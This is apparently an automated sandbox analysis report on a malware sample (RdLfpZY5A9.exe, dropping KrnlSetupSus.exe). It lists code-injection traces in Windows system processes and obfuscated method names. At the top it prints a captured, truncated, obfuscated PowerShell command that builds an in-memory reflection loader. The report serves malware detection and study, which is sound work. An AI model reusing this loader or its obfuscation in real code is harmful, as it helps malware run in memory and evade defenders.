                              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4ADEB05C push esp; retf 4_2_00007FFB4ADEB05D
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4ADEDC55 pushad ; iretd 4_2_00007FFB4ADEDC79
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_3_00000290EDB079F0 push rsp; retf 0000h6_3_00000290EDB079F1
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_3_00000290EDB08DD1 push rbx; retf 6_3_00000290EDB08DD2
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_3_00000290EDB08DD8 push rsp; retf 6_3_00000290EDB08DD9
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_3_00000290EDB1A5DD push rcx; retf 003Fh6_3_00000290EDB1A5DE
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_3_000002E9917279F0 push rsp; retf 0000h7_3_000002E9917279F1
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_3_000002E99173A5DD push rcx; retf 003Fh7_3_000002E99173A5DE
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_3_000002E991728DD1 push rbx; retf 7_3_000002E991728DD2
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_3_000002E991728DD8 push rsp; retf 7_3_000002E991728DD9
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4ACED2A5 pushad ; iretd 8_2_00007FFB4ACED2A6
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AE019DA pushad ; ret 8_2_00007FFB4AE019E9
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AED2316 push 8B485F92h; iretd 8_2_00007FFB4AED231B
                              Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000213BDCB8DD1 push rbx; retf 10_3_00000213BDCB8DD2
                              Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000213BDCCA5DD push rcx; retf 003Fh10_3_00000213BDCCA5DE
                              Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000213BDCB8DD8 push rsp; retf 10_3_00000213BDCB8DD9
                              Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000213BDCB79F0 push rsp; retf 0000h10_3_00000213BDCB79F1
                              Source: C:\Windows\System32\svchost.exeCode function: 11_3_00000158709A79F0 push rsp; retf 0000h11_3_00000158709A79F1
                              Source: C:\Windows\System32\svchost.exeCode function: 11_3_00000158709A8DD8 push rsp; retf 11_3_00000158709A8DD9
                              Source: C:\Windows\System32\svchost.exeCode function: 11_3_00000158709BA5DD push rcx; retf 003Fh11_3_00000158709BA5DE
                              Source: C:\Windows\System32\svchost.exeCode function: 11_3_00000158709A8DD1 push rbx; retf 11_3_00000158709A8DD2
                              Source: C:\Windows\System32\dwm.exeCode function: 12_3_0000026DB156A5DD push rcx; retf 003Fh12_3_0000026DB156A5DE
                              Source: C:\Windows\System32\dwm.exeCode function: 12_3_0000026DB1558DD1 push rbx; retf 12_3_0000026DB1558DD2
                              Source: C:\Windows\System32\dwm.exeCode function: 12_3_0000026DB1558DD8 push rsp; retf 12_3_0000026DB1558DD9
                              Source: C:\Windows\System32\dwm.exeCode function: 12_3_0000026DB15579F0 push rsp; retf 0000h12_3_0000026DB15579F1
                              Source: C:\Windows\System32\svchost.exeCode function: 13_3_000002A3EFFC79F0 push rsp; retf 0000h13_3_000002A3EFFC79F1
                              Source: C:\Windows\System32\svchost.exeCode function: 13_3_000002A3EFFDA5DD push rcx; retf 003Fh13_3_000002A3EFFDA5DE
                              Source: C:\Windows\System32\svchost.exeCode function: 13_3_000002A3EFFC8DD8 push rsp; retf 13_3_000002A3EFFC8DD9
                              Source: C:\Windows\System32\svchost.exeCode function: 13_3_000002A3EFFC8DD1 push rbx; retf 13_3_000002A3EFFC8DD2
                              Source: C:\Windows\System32\svchost.exeCode function: 15_3_000002C9AFB9A5DD push rcx; retf 003Fh15_3_000002C9AFB9A5DE
                              Source: C:\Windows\System32\svchost.exeCode function: 15_3_000002C9AFB88DD1 push rbx; retf 15_3_000002C9AFB88DD2
                              Source: RdLfpZY5A9.exeStatic PE information: section name: .text entropy: 7.986577451006427
                              Source: RdLfpZY5A9.exe, alIy4urw6ZG2T9PDfBIjnkiqw.csHigh entropy of concatenated method names: 'Pr8fjM0zXurZb15YbbotW2gYr', 'cEgJXUuxeQgEmiXmAtJIg8lEV', 'hTJCaANsznzPHgqPXV71cyfdO', 'yF6wmZngBWcQwXWvY7Vlh54r8', 'HDugdRJiD2Ty46k1bG432z8pl', 'aUWqS5zixnsZoe0X1ZuTWhxuB', 'iATTAURfxvbpwiWwlvkEzzwuG', 'uiHhryvKH9tlp2Noyq1QsdrBG', 'mH3t5L7XpeAlm5hEig8IYGvSs', '_15SNqpDkzoEq7i3jWmBP4S5Ov'
                              Source: RdLfpZY5A9.exe, WKd5CrXXyuWqnks4QEXvwcII4.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'il4Tkk1xnVda9Aau7ncvqSV5v', 'DQ3kUJOvER9rpavT4Mm0CPA2h', 'tJX6wP3k6eXnxuQCSpIY2Casw', 'ONZV5tjGA0l5NwyQds5OaYiOr'
                              Source: KrnlSetupSus.exe.0.dr, An0DSGyo344mWvaOGRrvwB3xPQTerGsbqj4hWP87gE2xj6Xf861To.csHigh entropy of concatenated method names: 'vHFFmttLONVktUsWUA3AJGFdJWwH3LXW3xXjpw21bBBfogjdXwixL', 'pDig5htp97pCUFbUOWgCFQEhPPMCswUZeqO0OvckzS0LVMk2IbATt', '_3zX6h0rbxTkLHYQL5aUcLZHZ7UzQhII1RWwOwCq7kahd95MljO1Y8', 'qWQJ4sEDsHWDMdrXMBkWJJMAR2ZJYuHYUXWKncElQ', 'gq4Qkyfs4qJPW0ELlZ3kPt15qUZ0cxiBsFeAPeQI5', 'RFBbtf7HwHMb6tA0XzPhNh0zTs2JPusWSKjbkqzCH', 'Ggm60FFRlbFETKfaMX2uqzTwCAlOOfzdpr80PQzQt', 'SfbFF1YXwOThpiQCsrqLkaZcTWr8qgkCV0BH53CKx', 'o54yd07s4Ybrh2mMTQmPy9G13JW9ciIrO77zM8H2u', 'pnE5wwk6209HgsLniyDfSldBWArhFkd7jbxxWqdyQ'
                              Source: KrnlSetupSus.exe.0.dr, g59OujVBB7MZJrqDCW5gf5pEZBK5CRLNy2qq.csHigh entropy of concatenated method names: 'Udog1cHZ1AZJdMqeZsOj2t0bHbbfTPyLXdZe', 'TTYQ8X2ipUHHOkpu8pFoVFvSsdMubt5OxO8w', 'HT2IJGVpP7zoCQKtrmw3udmHXeOWC8OpeL8N', 'M9quXEQLDHFgQdGrsqwRWJUMnoQCKJWjSr19mi7k424vOIRs8Fm0VrYwzEFpRaL', '_1R6sIwUFYAWIMc0rzfxjghWNfbNjvLbVc8IJBPCINsJKoQXG1mhyq3NKOhHPeSr', 'rDsj1OqcOyybEuCLD2FFi2BigjKCDFhW9PjBvEGOqBEnsU9SFadJtQkG7xaHR7X', 'qIJHJB3QXPOXWlGDcFiDAmtKitBmvx9A5fUf7AI0uqYmSXmbBJoJerF6poK7WhD', 'GHUFd804U76ooo0qpMgfZJtEwg6rVUVsmOdRDm6D4eJcy5wWm2iRwOzKSeaZU2v', 'HnLd5xAdbGZEMuhGUGFFabByTNuTI0ppEXue9G35Rm7RfXZT', 'Wbg4wkSPngGqJ8xephornvch2JT70vBDY2ex0FEFCEq8NqbS'
                              Source: KrnlSetupSus.exe.0.dr, B9E2fnMLcC12guuhzPwoS77zgW1ZgEiELCEEKaw2Klq5.csHigh entropy of concatenated method names: 'nvIwktLoxcNX1Yoqnf7SQGBzq9bmI6sAxpElhIxlHTTf', 'WAB40fyGIXFhlujIcnNSF6ImInBnekudbmbqIGmAsaQw', 'kZ8CdUlCp9uvwjQ3Qbw7TWFHyuInWi0dQnSIix6anlMJaie9o45d4PFFYcqaBFiqYovX8AZKjN8V', 'RKBr7RPx5MBcrYIh4IgNXmAPocRcxQIkES4vegZIf1KcSH7FtVgMm7LCGj2zT2NxkMkCki6Wu42g', '_2r1fsEY49aYbWGhzoGwNPvx1xQHfdn8rwpgaNoXz0Tuwx8n9y3w3rfGvPwPBcoQOVdGokzb2Yyq3', 's5g5xnN65pkcCGULZ4wfhDYsp3th2DWLXvhEsmb3JX3mt5g4QxSEY0anSxtvAHY62UNFQHi0BqM7', '_4OPzvYsw9YIZjEk0ugcA2t02sl6ai564i56NGeOWtgK3Xtr8qAwUFsInykU1M6qA3oGUuKoAzkN0', 'IbOlDrDw4uKuYEJJ7oENUTQVkFnyEAdK2E0nTN4HJMXZvdnUqL6A7xGIi5ecKEQ5qrimIPMJJsmC', 'E1CYunwxKQKpCDj7UCg7Iop0sQjq8FSZVg8O0lpyuUDw8tgLwTI5T6Ubs3ehtnKDgbDsnsr7nIlr', 'COf9r32smfr6yi32UMkNpnw81JfdBdmdEcHppRVvIgTUxLItsohhP6bWoT7cTmmGPTaO3XuntYsy'
                              Source: KrnlSetupSus.exe.0.dr, fBE1wflwwjJOP1BboN3oP.csHigh entropy of concatenated method names: 'YD0QCSyqPyrsjswITvyc0', 'F4ZGWRWk4BZtS1nHIrJoM', 'JV1vJlWqNGKTYu462VICF', 'Tsa3qapValzJx3jV7kJRC', 'PSDL1hLudsVOQbbVaV1Ou', '_5UkLRybGfm6953NTMwCch', 'iSkYSAOPrdhrNkZZh8yhq', 'XQ40cR7S4gZaA89F6Dlrf', 'SRFpPA3NOPbiTTzozqFUt', '_2rM7AGNhDvP80KL8aaGC5'
                              Source: KrnlSetupSus.exe.0.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csHigh entropy of concatenated method names: 'Y6S3kL36Hhi6Szxbaj5z8VUc7sfdv7uyv94sqgvyBeGZELv8NjXahMovEPMValZLRFmzxkbA5RYb', 'XMskKsZQ9xFCDyWv1SHyit5MgjJ9eXAPgl7rq9zocjRtYNs7ZTqJBnKwpZYk3Tjg7rv8gsTdiSz6', 'IuE5JWtWX7HFtcdEkmeLXOGSGvEac8otBZ8VrB7hcFItnfZyvxNUwrGatrgiV', 'J2dXMjGxtzHtGu95nwioA8GXiUZzxw9IVzHT6uy7a6wVG2Dv8y9nILQKtkvTH', '_5KTvCTOAK8L5ko8fjIS43bGsdndlEbKw5kbl98Nb1lZnB4duTz0K1I2LlX7sB', 'UeEZcneYsNnSeeAIZo1ffRvkfTugfxvXkoNUmaSKo7U7ifDU6066uKRT3r5h8', 'X5WDd7gjKzGrWNWDILbOkkcP8yF5HqxbM9XV4N2uuH2ZQkytMncHp8s8xMM05', '_9TqFNy41v0GiP4F1cETXtPtqFnfoEYCpQyaaD7SJ9TOVInQp5VgICBRYDRZrM', 'HQuHRHRNRfM6PqMn65cZcAsVxDrWU96TV7WGulbL7V1W4ipHP3qgvZ9igMx7t', 'rjP5LEPeLfi3iwoWJZhMhMHVIq2WMWMypmKPM64aivEKzGy5C7GgI3y3N3vPR'
                              Source: KrnlSetupSus.exe.0.dr, n2VU5KGecv5aHTrU9Mb0Y.csHigh entropy of concatenated method names: 'tQTtE8TgSIaIHHMv1vHgk', 'poMSvK625dXjX4DLt1GoPxkDF4gmzUj1m2gXBXLja1YnsNXg2aGONjOlYMWJPU94pfzARuv5uUboODqA9', 'VkyPJkFmps3stXrDTV3HiuHEKbmdyK0Sdd02RIUBO8CnlaFkj2g41fkUgvR2Xr8IXfL3FBnNbsbpCSwQy', 'gTQLiUl5jHM6EM5h4OLGsbKAgcYt5k7y7EyfgXCpoOwwdGCnQJ5eqPF9ubElDaVgeC7sXmlQGvGaYlBA5', '_2pr1umXGVGVA4sjOu8o81mXfEsHV8SfL326eNWGWUpTQrDHtiE9LROmr75Xj46jyM4Y8A1BTekoVBhGCG'
                              Source: KrnlSetupSus.exe.0.dr, iRivwccr5pOuk6KKkp3t6eiIuTgZTwKJ8CfW.csHigh entropy of concatenated method names: '_2cm4dcpEA29Z6snowz1i3MloVubUZygEkOvk', 'hjsXV3YkekSdVTRTKUgBkabyxqXUtATdRbAg', 'WEz5LK16Y9RN2LoTju2Vf2AvCuxMuijFZ8YJ', 'sjBFheflFg6hfHtLrQaGsQqQcSl9ASPJAW2K', 'Ek7zboftpByzlUVnF7y27HEcj9nQalRUglxd', 'mqrsPQD1SKmKewROMjcFcnJyOxgaUA5KLfD2', 'iJJyJXC3nry792reNxn1j', 'xzF7fJAqbsXP9Fxbb3FO6', 'Qc0feZTjFDxANHPoAdAwf', 'Da7RH067eSxE5WmxXlO3a'
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.csHigh entropy of concatenated method names: 'bZELyPv3sja3iEp6tfftvGVG1y3nZhWPyb4Yrb1ZrUWizO4DUyMVnkotU2D8KPtY645dXWVnGMgLOLlZ6VxKpNMAyewggN', 'ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u', 'tdkTdJfS3CUjbu0zLiwC0OS0E2inThepfOryywwLmCKe6tVR5MtPJnk3lILmsCBcccyVPtD5SnoxRVyb89Ls0cvzS88htN', 'yhlg7wWe2xBtm0uQU4gO0padLD4ICYPpCGSKC2E0mqps610BIgpa3IqJRmwuF2zhCXFYDguhvqwlCcBLBI4N3UhMuqoFI3', '_9IbWxPrVmeYs17G1W7t9s5KsZohJc8RouvBX991UbIMDkl2cwdC2PnNBfJqBk0KmCiR5GdIHDXVhRdDCnpMYnOienu6VeO', '_8SXDO5zQtqSdvrNA62QJFzFSUpPW53hMpgMj1OgTIQfZmLQLgn0GGrrlyDxT5AVtuJE4sYTk0UZU2jsa7Fynpm6e6F17EX', 'mb359UbXwCtCUiRSgJSuNvZ8imfLN3qpjfOUsebZqacEQsV9owqeyAj6go0CZcHjBBbWtRiCLfzKB1lSIz8CzjuG6ZcwvR', 'sasNNjZ3RAo1mY0lB5QmByitrq1TFWRqxLV5', 'UI6Mvbuu37198ktvpls3iZmWuR4MY8VKuvvZ', '_9NrUYW2N1UCvJFwXVkljmqrPmK0PyGZU8xAh'
                              Source: KrnlSetupSus.exe.0.dr, WbZaHv4xuPSeZw2uAq4Js.csHigh entropy of concatenated method names: 'p1ZObOBDiiCdmpAHuZPCz', 'uKfwK6UHGlWnwlTxMuyZu', 'hTgbJvszj5Fn2Yyw4coaY', 'tEyVsPFLaQbs1Ms4fJWS2', 'LxcIxEh3wO4tfR6EFFwO7z97nFh4SjXFXVTYrnSSm1z1FiiWLY0c9yLV1WJZJDTiCQoO5jTAw3A293s81', 'Q7uLhPFA9x07ddwqXDvd9rqN2YsJqMOpj0NXCWUE0s6Bs7E3K2Eui4PN2a0uXX22DQuaV3AP2F43oPYwA', '_4OR978IwofAET9FeEwdugcsmibi1f3keYmqdsfnGQcQ93wtF4rS4QeySF930AiCg74qm3G77HPRLXWZEe', 'OnxXct0BLVJNUY42bfm3BlHNEzzVYn6W2V3GhtRhzP5LcciACAZEw75Iias6hEcYaq1gOAgxbmSdq1TVh', 'vfPucQzH31Aaj7pIXhk7iaCn3K9a5CctLzj39d2o7QgCsyIJ4WAe4i00U09H9DicnPzoeege2jtXVCYFC', '_8Bf9eZZmohMkIkrERgdVHYTqUPFJwRUUyPkaZMi84VgqQnNImGK58edVhnpkppTmI7oRV1FJVUXvSJtCz'
                              Source: KrnlSetupSus.exe.0.dr, gbSyzXQhgHNZmmbfmM8GltxWX51PeZR1IbpV.csHigh entropy of concatenated method names: '_0Tn8eiUBotyOjBtK4ys8Uf813ry6LjWuikS0', 'C8ADOhQ3KeBvCXnKAjGv6J3XM7TCpsX4tVM2lsThPwpStVfgUL06JOfrYHd0wA5', 'PsdvIju2ypJ9PqqIWRqI9KvAnEXBoZmjOnRut1tXv2U4GnESElS3ewxafh4B1Di', '_3eYv3dv27en6o2hRGw5Nnr60o09PnZdx3R0p2DzYRlLZrEX6pr5ENSPxVNOv1ik', 'BCVkibtgWDAggWeWvVrNeQzByt9mUF3s46FIvB9nfQkeB5Dd9dzFXC4NcIdq4Pz'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, An0DSGyo344mWvaOGRrvwB3xPQTerGsbqj4hWP87gE2xj6Xf861To.csHigh entropy of concatenated method names: 'vHFFmttLONVktUsWUA3AJGFdJWwH3LXW3xXjpw21bBBfogjdXwixL', 'pDig5htp97pCUFbUOWgCFQEhPPMCswUZeqO0OvckzS0LVMk2IbATt', '_3zX6h0rbxTkLHYQL5aUcLZHZ7UzQhII1RWwOwCq7kahd95MljO1Y8', 'qWQJ4sEDsHWDMdrXMBkWJJMAR2ZJYuHYUXWKncElQ', 'gq4Qkyfs4qJPW0ELlZ3kPt15qUZ0cxiBsFeAPeQI5', 'RFBbtf7HwHMb6tA0XzPhNh0zTs2JPusWSKjbkqzCH', 'Ggm60FFRlbFETKfaMX2uqzTwCAlOOfzdpr80PQzQt', 'SfbFF1YXwOThpiQCsrqLkaZcTWr8qgkCV0BH53CKx', 'o54yd07s4Ybrh2mMTQmPy9G13JW9ciIrO77zM8H2u', 'pnE5wwk6209HgsLniyDfSldBWArhFkd7jbxxWqdyQ'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, g59OujVBB7MZJrqDCW5gf5pEZBK5CRLNy2qq.csHigh entropy of concatenated method names: 'Udog1cHZ1AZJdMqeZsOj2t0bHbbfTPyLXdZe', 'TTYQ8X2ipUHHOkpu8pFoVFvSsdMubt5OxO8w', 'HT2IJGVpP7zoCQKtrmw3udmHXeOWC8OpeL8N', 'M9quXEQLDHFgQdGrsqwRWJUMnoQCKJWjSr19mi7k424vOIRs8Fm0VrYwzEFpRaL', '_1R6sIwUFYAWIMc0rzfxjghWNfbNjvLbVc8IJBPCINsJKoQXG1mhyq3NKOhHPeSr', 'rDsj1OqcOyybEuCLD2FFi2BigjKCDFhW9PjBvEGOqBEnsU9SFadJtQkG7xaHR7X', 'qIJHJB3QXPOXWlGDcFiDAmtKitBmvx9A5fUf7AI0uqYmSXmbBJoJerF6poK7WhD', 'GHUFd804U76ooo0qpMgfZJtEwg6rVUVsmOdRDm6D4eJcy5wWm2iRwOzKSeaZU2v', 'HnLd5xAdbGZEMuhGUGFFabByTNuTI0ppEXue9G35Rm7RfXZT', 'Wbg4wkSPngGqJ8xephornvch2JT70vBDY2ex0FEFCEq8NqbS'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, B9E2fnMLcC12guuhzPwoS77zgW1ZgEiELCEEKaw2Klq5.csHigh entropy of concatenated method names: 'nvIwktLoxcNX1Yoqnf7SQGBzq9bmI6sAxpElhIxlHTTf', 'WAB40fyGIXFhlujIcnNSF6ImInBnekudbmbqIGmAsaQw', 'kZ8CdUlCp9uvwjQ3Qbw7TWFHyuInWi0dQnSIix6anlMJaie9o45d4PFFYcqaBFiqYovX8AZKjN8V', 'RKBr7RPx5MBcrYIh4IgNXmAPocRcxQIkES4vegZIf1KcSH7FtVgMm7LCGj2zT2NxkMkCki6Wu42g', '_2r1fsEY49aYbWGhzoGwNPvx1xQHfdn8rwpgaNoXz0Tuwx8n9y3w3rfGvPwPBcoQOVdGokzb2Yyq3', 's5g5xnN65pkcCGULZ4wfhDYsp3th2DWLXvhEsmb3JX3mt5g4QxSEY0anSxtvAHY62UNFQHi0BqM7', '_4OPzvYsw9YIZjEk0ugcA2t02sl6ai564i56NGeOWtgK3Xtr8qAwUFsInykU1M6qA3oGUuKoAzkN0', 'IbOlDrDw4uKuYEJJ7oENUTQVkFnyEAdK2E0nTN4HJMXZvdnUqL6A7xGIi5ecKEQ5qrimIPMJJsmC', 'E1CYunwxKQKpCDj7UCg7Iop0sQjq8FSZVg8O0lpyuUDw8tgLwTI5T6Ubs3ehtnKDgbDsnsr7nIlr', 'COf9r32smfr6yi32UMkNpnw81JfdBdmdEcHppRVvIgTUxLItsohhP6bWoT7cTmmGPTaO3XuntYsy'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, fBE1wflwwjJOP1BboN3oP.csHigh entropy of concatenated method names: 'YD0QCSyqPyrsjswITvyc0', 'F4ZGWRWk4BZtS1nHIrJoM', 'JV1vJlWqNGKTYu462VICF', 'Tsa3qapValzJx3jV7kJRC', 'PSDL1hLudsVOQbbVaV1Ou', '_5UkLRybGfm6953NTMwCch', 'iSkYSAOPrdhrNkZZh8yhq', 'XQ40cR7S4gZaA89F6Dlrf', 'SRFpPA3NOPbiTTzozqFUt', '_2rM7AGNhDvP80KL8aaGC5'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csHigh entropy of concatenated method names: 'Y6S3kL36Hhi6Szxbaj5z8VUc7sfdv7uyv94sqgvyBeGZELv8NjXahMovEPMValZLRFmzxkbA5RYb', 'XMskKsZQ9xFCDyWv1SHyit5MgjJ9eXAPgl7rq9zocjRtYNs7ZTqJBnKwpZYk3Tjg7rv8gsTdiSz6', 'IuE5JWtWX7HFtcdEkmeLXOGSGvEac8otBZ8VrB7hcFItnfZyvxNUwrGatrgiV', 'J2dXMjGxtzHtGu95nwioA8GXiUZzxw9IVzHT6uy7a6wVG2Dv8y9nILQKtkvTH', '_5KTvCTOAK8L5ko8fjIS43bGsdndlEbKw5kbl98Nb1lZnB4duTz0K1I2LlX7sB', 'UeEZcneYsNnSeeAIZo1ffRvkfTugfxvXkoNUmaSKo7U7ifDU6066uKRT3r5h8', 'X5WDd7gjKzGrWNWDILbOkkcP8yF5HqxbM9XV4N2uuH2ZQkytMncHp8s8xMM05', '_9TqFNy41v0GiP4F1cETXtPtqFnfoEYCpQyaaD7SJ9TOVInQp5VgICBRYDRZrM', 'HQuHRHRNRfM6PqMn65cZcAsVxDrWU96TV7WGulbL7V1W4ipHP3qgvZ9igMx7t', 'rjP5LEPeLfi3iwoWJZhMhMHVIq2WMWMypmKPM64aivEKzGy5C7GgI3y3N3vPR'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, n2VU5KGecv5aHTrU9Mb0Y.csHigh entropy of concatenated method names: 'tQTtE8TgSIaIHHMv1vHgk', 'poMSvK625dXjX4DLt1GoPxkDF4gmzUj1m2gXBXLja1YnsNXg2aGONjOlYMWJPU94pfzARuv5uUboODqA9', 'VkyPJkFmps3stXrDTV3HiuHEKbmdyK0Sdd02RIUBO8CnlaFkj2g41fkUgvR2Xr8IXfL3FBnNbsbpCSwQy', 'gTQLiUl5jHM6EM5h4OLGsbKAgcYt5k7y7EyfgXCpoOwwdGCnQJ5eqPF9ubElDaVgeC7sXmlQGvGaYlBA5', '_2pr1umXGVGVA4sjOu8o81mXfEsHV8SfL326eNWGWUpTQrDHtiE9LROmr75Xj46jyM4Y8A1BTekoVBhGCG'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, iRivwccr5pOuk6KKkp3t6eiIuTgZTwKJ8CfW.csHigh entropy of concatenated method names: '_2cm4dcpEA29Z6snowz1i3MloVubUZygEkOvk', 'hjsXV3YkekSdVTRTKUgBkabyxqXUtATdRbAg', 'WEz5LK16Y9RN2LoTju2Vf2AvCuxMuijFZ8YJ', 'sjBFheflFg6hfHtLrQaGsQqQcSl9ASPJAW2K', 'Ek7zboftpByzlUVnF7y27HEcj9nQalRUglxd', 'mqrsPQD1SKmKewROMjcFcnJyOxgaUA5KLfD2', 'iJJyJXC3nry792reNxn1j', 'xzF7fJAqbsXP9Fxbb3FO6', 'Qc0feZTjFDxANHPoAdAwf', 'Da7RH067eSxE5WmxXlO3a'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.csHigh entropy of concatenated method names: 'bZELyPv3sja3iEp6tfftvGVG1y3nZhWPyb4Yrb1ZrUWizO4DUyMVnkotU2D8KPtY645dXWVnGMgLOLlZ6VxKpNMAyewggN', 'ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u', 'tdkTdJfS3CUjbu0zLiwC0OS0E2inThepfOryywwLmCKe6tVR5MtPJnk3lILmsCBcccyVPtD5SnoxRVyb89Ls0cvzS88htN', 'yhlg7wWe2xBtm0uQU4gO0padLD4ICYPpCGSKC2E0mqps610BIgpa3IqJRmwuF2zhCXFYDguhvqwlCcBLBI4N3UhMuqoFI3', '_9IbWxPrVmeYs17G1W7t9s5KsZohJc8RouvBX991UbIMDkl2cwdC2PnNBfJqBk0KmCiR5GdIHDXVhRdDCnpMYnOienu6VeO', '_8SXDO5zQtqSdvrNA62QJFzFSUpPW53hMpgMj1OgTIQfZmLQLgn0GGrrlyDxT5AVtuJE4sYTk0UZU2jsa7Fynpm6e6F17EX', 'mb359UbXwCtCUiRSgJSuNvZ8imfLN3qpjfOUsebZqacEQsV9owqeyAj6go0CZcHjBBbWtRiCLfzKB1lSIz8CzjuG6ZcwvR', 'sasNNjZ3RAo1mY0lB5QmByitrq1TFWRqxLV5', 'UI6Mvbuu37198ktvpls3iZmWuR4MY8VKuvvZ', 